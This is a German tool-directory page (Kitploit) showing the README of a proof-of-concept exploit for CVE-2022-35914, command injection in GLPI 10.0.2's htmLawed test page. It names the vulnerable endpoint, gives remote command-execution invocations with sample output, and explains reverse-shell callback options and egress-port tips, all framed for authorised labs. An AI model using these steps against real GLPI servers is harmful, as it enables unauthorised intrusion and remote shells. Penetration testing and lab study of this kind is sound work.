Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-35914-RCE — PoC-Exploit für CVE-2022-35914 — GLPI v.10.0.2 htmLawed: Befehlsinjektion, Befehlsausführung und Unterstützung für Reverse Shells. | Kitploit
Tools/GitHubGitHub/cyb3rk0ala/cve-2022-35914-rce
ExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubcyb3rk0ala/cve-2022-35914-rce

CVE-2022-35914-RCE

PoC-Exploit für CVE-2022-35914 — GLPI v.10.0.2 htmLawed: Befehlsinjektion, Befehlsausführung und Unterstützung für Reverse Shells.

Repository anzeigen
14vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-35914 von cyb3rk0ala

PoC für CVE-2022-35914, eine Command-Injection-Schwachstelle im htmLawed-Testkomponenten in verwundbaren GLPI-Installationen.

Das Tool ermöglicht die Befehlsausführung über den verwundbaren Endpunkt und enthält eine optionale Callback-Funktionalität für autorisierte Laborumgebungen.

Haftungsausschluss: Dieses Projekt ist ausschließlich für autorisierte Sicherheitstests, CTFs, OffSec/PG-Labs und Bildungszwecke gedacht. Verwende es nicht gegen Systeme ohne ausdrückliche Autorisierung.


Schwachstelle

FeldDetails
CVECVE-2022-35914
SoftwareGLPI v.10.0.2
KomponentehtmLawed
Verwundbarer Endpunkt/vendor/htmlawed/htmlawed/htmLawedTest.php

Die verwundbare Komponente kann die Befehlsausführung über manipulierte Parameter auf betroffenen Installationen ermöglichen.


Funktionen

  • Befehlsausführung
  • Automatische Ziel-URL-Konstruktion
  • Konfigurierbarer HTTP-Zielport
  • Automatischer Session-/Token-Abruf
  • Extraktion der Befehlsausgabe
  • Zielprüfung
  • Unterstützung für benutzerdefinierten User-Agent
  • Optionale Callback-Konfiguration
  • Farbige Terminalausgabe
  • Python-3-CLI-Schnittstelle

Anforderungen

Python 3 und die erforderlichen Abhängigkeiten.

Kali Linux

sudo apt install python3-requests python3-bs4

Virtuelle Umgebung

python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4

Installation

Repository klonen:

git clone https://github.com/cyb3rk0ala/CVE-2022-35914.git
cd CVE-2022-35914

Skript ausführbar machen:

chmod +x glpi.py

Verwendung

Hilfe

python3 glpi.py -h

Einfache Befehlsausführung

python3 glpi.py -u TARGET_IP -c 'id'

Beispielausgabe:

[*] Target: http://TARGET_IP:80/vendor/htmlawed/htmlawed/htmLawedTest.php

========== COMMAND OUTPUT ==========
uid=33(www-data) gid=33(www-data) groups=33(www-data)
====================================

Befehlsausführung

Die Option -c gibt den auszuführenden Befehl an.

Aktueller Benutzer

python3 glpi.py -u TARGET_IP -c 'whoami'

Aktuelle Berechtigungen

python3 glpi.py -u TARGET_IP -c 'id'

Betriebssystem

python3 glpi.py -u TARGET_IP -c 'uname -a'

Verfügbare Dienstprogramme

python3 glpi.py -u TARGET_IP -c 'which bash'
python3 glpi.py -u TARGET_IP -c 'which python3'
python3 glpi.py -u TARGET_IP -c 'which php'
python3 glpi.py -u TARGET_IP -c 'which nc'

Optionen

OptionBeschreibungStandard
-u, --urlZiel-URL oder IP-AdresseErforderlich
-c, --cmdAuszuführender Befehlid
--checkZiel prüfen, ohne einen Befehl auszuführenDeaktiviert
--user-agentBenutzerdefinierter HTTP-User-AgentStandard
-p, --rportHTTP-Zieldienstport80
-l, --lhostCallback-/Listener-IP-Adresse—
-lp, --lportCallback-/Listener-Port—

Zielport

Die Option -p / --rport gibt den Port an, auf dem der verwundbare GLPI-Webdienst läuft.

Standard:

80

Beispiel:

python3 glpi.py -u TARGET_IP -p 80 -c 'id'

Zielprüfung

Verwende --check, um zu überprüfen, ob die htmLawed-Testseite verfügbar ist, ohne einen Befehl auszuführen:

python3 glpi.py -u TARGET_IP --check

Benutzerdefinierter User-Agent

Ein benutzerdefinierter HTTP-User-Agent kann angegeben werden mit:

python3 glpi.py \
    -u TARGET_IP \
    --user-agent 'Mozilla/5.0'

Reverse Shell

Das Skript unterstützt optionale Callback-Parameter:

-l   Callback-/Listener-IP
-lp  Callback-/Listener-Port

Beispiel:

python3 glpi.py \
    -u TARGET_IP \
    -p 80 \
    -l LHOST \
    -lp 80

In diesem Beispiel:

Target:   TARGET_IP:80
Callback: LHOST:80

Die beiden Ports haben unterschiedliche Zwecke:

-p   = GLPI-HTTP-Zielport
-lp  = Callback-/Listener-Port

OffSec-Lab-Hinweis

Während des Tests in einer OffSec-Lab-Umgebung funktionierte der Callback erfolgreich über TCP-Port 80.

Andere Callback-Ports wie 4444 können je nach Lab-Netzwerk und Egress-Filterung ein Timeout verursachen.

Für die getestete Umgebung:

python3 glpi.py \
    -u TARGET_IP \
    -p 80 \
    -l LHOST \
    -lp 80

Der Listener wurde auf der Kali-VPN-Schnittstelle unter Verwendung von TCP-Port 80 konfiguriert.

Wichtig: Die Verwendung von Port 80 für den Callback ist eine umgebungsspezifische Beobachtung. Sie ist keine Voraussetzung von CVE-2022-35914.


Fehlerbehebung

Befehlsausführung funktioniert, aber Callback nicht

Überprüfe zunächst die Befehlsausführung:

python3 glpi.py -u TARGET_IP -c 'id'

Prüfe, ob die erforderlichen Dienstprogramme vorhanden sind:

python3 glpi.py -u TARGET_IP -c 'which bash'
python3 glpi.py -u TARGET_IP -c 'which python3'
python3 glpi.py -u TARGET_IP -c 'which php'
python3 glpi.py -u TARGET_IP -c 'which nc'

Wenn die Befehlsausführung funktioniert, aber der Callback ein Timeout verursacht, überprüfe das VPN-Routing und den Callback-Port.


Befehlsausgabe scheint falsch zu sein

Wenn die Analyse der Befehlsausgabe fehlschlägt, wird die vollständige HTTP-Antwort gespeichert unter:

/tmp/glpi.html

Untersuche sie mit:

less /tmp/glpi.html

oder:

mousepad /tmp/glpi.html

Beispiel-Workflow

1. Ziel prüfen

python3 glpi.py \
    -u TARGET_IP \
    --check

2. Befehlsausführung bestätigen

python3 glpi.py \
    -u TARGET_IP \
    -c 'id'

3. Aktuellen Benutzer identifizieren

python3 glpi.py \
    -u TARGET_IP \
    -c 'whoami'

4. Verfügbare Tools prüfen

python3 glpi.py \
    -u TARGET_IP \
    -c 'which nc'

5. Callback konfigurieren

Für die getestete OffSec-Lab-Umgebung:

python3 glpi.py \
    -u TARGET_IP \
    -p 80 \
    -l LHOST \
    -lp 80

Haftungsausschluss

Dieses Projekt wird ausschließlich für Bildungs- und autorisierte Sicherheitstestzwecke bereitgestellt.

Der Autor ist nicht verantwortlich für Missbrauch, Schäden, unbefugten Zugriff oder illegale Aktivitäten im Zusammenhang mit dieser Software.

Vor dem Testen eines Systems stets eine ausdrückliche Autorisierung einholen.


Autor

cyb3rk0ala


CVE

CVE-2022-35914


Projekt

CVE-2022-35914 von cyb3rk0ala

Tool herunterladen